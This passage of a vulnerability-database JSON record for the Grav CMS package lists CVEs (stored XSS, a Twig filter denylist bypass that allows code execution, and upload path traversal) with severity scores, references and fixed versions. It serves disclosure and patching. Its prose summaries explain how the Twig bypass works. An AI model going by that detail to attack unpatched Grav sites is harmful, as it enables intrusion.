                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"
                }
            ],
            "aliases": [
                "CVE-2024-28116",
                "GHSA-c9gp-64c4-2rrh"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yh73-zyju-vqge"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49445?format=api",
            "vulnerability_id": "VCID-ymnw-h6as-fbe5",
            "summary": "Grav is vulnerable to Stored XSS through authenticated user-edited content\ngrav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66843",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07703",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66843"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-16T17:33:18Z/"
                        }
                    ],
                    "url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66843",
                    "reference_id": "CVE-2025-66843",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66843"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mh85-44c2-3m97",
                    "reference_id": "GHSA-mh85-44c2-3m97",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mh85-44c2-3m97"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/907178?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1"
                }
            ],
            "aliases": [
                "CVE-2025-66843",
                "GHSA-mh85-44c2-3m97"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ymnw-h6as-fbe5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45423?format=api",
            "vulnerability_id": "VCID-z1hg-w198-f7h8",
            "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a file-based Web platform. Prior to version 1.7.42, there is a logic flaw in the `GravExtension.filterFilter()` function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. The vulnerability can be found in the `GravExtension.filterFilter()` function declared in `/system/src/Grav/Common/Twig/Extension/GravExtension.php`. Version 1.7.42 contains a patch for this issue. End users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34252",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00529",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67561",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34252"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34252",
                    "reference_id": "CVE-2023-34252",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34252"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-96xv-rmwj-6p9w",
                    "reference_id": "GHSA-96xv-rmwj-6p9w",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-96xv-rmwj-6p9w"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w",
                    "reference_id": "GHSA-96xv-rmwj-6p9w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.42",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ps5-3k43-p3fa"
                        },
                        {
                            "vulnerability": "VCID-4a2z-37a3-2qaw"
                        },
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-7jaz-7xjc-kka1"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-a8y8-y4zt-zqbv"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-bwvg-jg4z-nyhp"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-ru55-uj84-p3dr"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-yh73-zyju-vqge"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        },
                        {
                            "vulnerability": "VCID-zg5t-uqx2-87fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"
                }
            ],
            "aliases": [
                "CVE-2023-34252",
                "GHSA-96xv-rmwj-6p9w"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z1hg-w198-f7h8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47306?format=api",
            "vulnerability_id": "VCID-zg5t-uqx2-87fw",
            "summary": "Grav File Upload Path Traversal\nGrav is vulnerable to a file upload path traversal vulnerability that can allow an adversary to replace or create files with extensions such as .json, .zip, .css, .gif, etc. This vulnerability can allow attackers to inject arbitrary code on the server, undermine the integrity of backup files by overwriting existing backups or creating new ones, and exfiltrate sensitive data using CSS Injection exfiltration techniques.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27921",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.08787",
                            "scoring_system": "epss",
                            "scoring_elements": "0.92679",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27921"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27921",
                    "reference_id": "CVE-2024-27921",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27921"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m7hx-hw6h-mqmc",
                    "reference_id": "GHSA-m7hx-hw6h-mqmc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m7hx-hw6h-mqmc"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc",
                    "reference_id": "GHSA-m7hx-hw6h-mqmc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.45",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"
                }
            ],
            "aliases": [
                "CVE-2024-27921",
                "GHSA-m7hx-hw6h-mqmc"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zg5t-uqx2-87fw"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": null,
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.36"
}